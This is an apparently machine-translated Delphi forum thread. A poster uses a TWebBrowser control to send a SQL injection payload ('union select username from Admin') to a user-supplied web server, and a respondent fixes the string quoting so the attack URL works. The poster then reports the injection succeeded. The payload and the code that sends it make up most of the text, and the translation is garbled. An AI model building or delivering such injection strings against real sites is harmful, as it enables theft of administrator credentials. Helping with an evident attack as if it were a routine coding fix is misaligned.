Webbrowser URL Connection problems Delphi/Windows SDK/API
Http://www.delphi2007.net/DelphiNetwork/html/delphi_20061202200134214.html
Implementation: After clicking the button, send a string after edit1.text + 'to the Web server
The following is a string:
/Region. asp? Country = TT & City = fucka & province = bug 'and 1 = 2 Union select username from Admin where 1 <2 and '1' = '1
My Code
Procedure tform1.button2click (Sender: tobject );
Begin
Self. webbrowser1.navigate (edit1.text + '/region. asp? Country = TT & City = fucka & province = bug ''+ 'and' + '1 = 2' + 'Union '+ 'select' + 'username' + 'from' + 'admin' + 'where' + '1' + '<' + '2' + 'and' + '1' = '1 );
End;
Error message: Missing operator or semicolon
Hope you give me some advice
If your url is like that (I didn't see what the strings submitted to ASP mean), you can follow these steps:
VaR S: string;
Begin
S: = S + '/region. asp? Country = TT & City = fucka & province = bug ';
S: = S + quotedstr ('and 1 = 2 Union select username from Admin where 1 <2 and ');
S: = S + '1 ';
S: = S + quotedstr ('= ');
S: = S + '1 ';
Webbrowser1.navigate (edit1.text + S );
End;
Thanks for your advice. This string is tested and injected.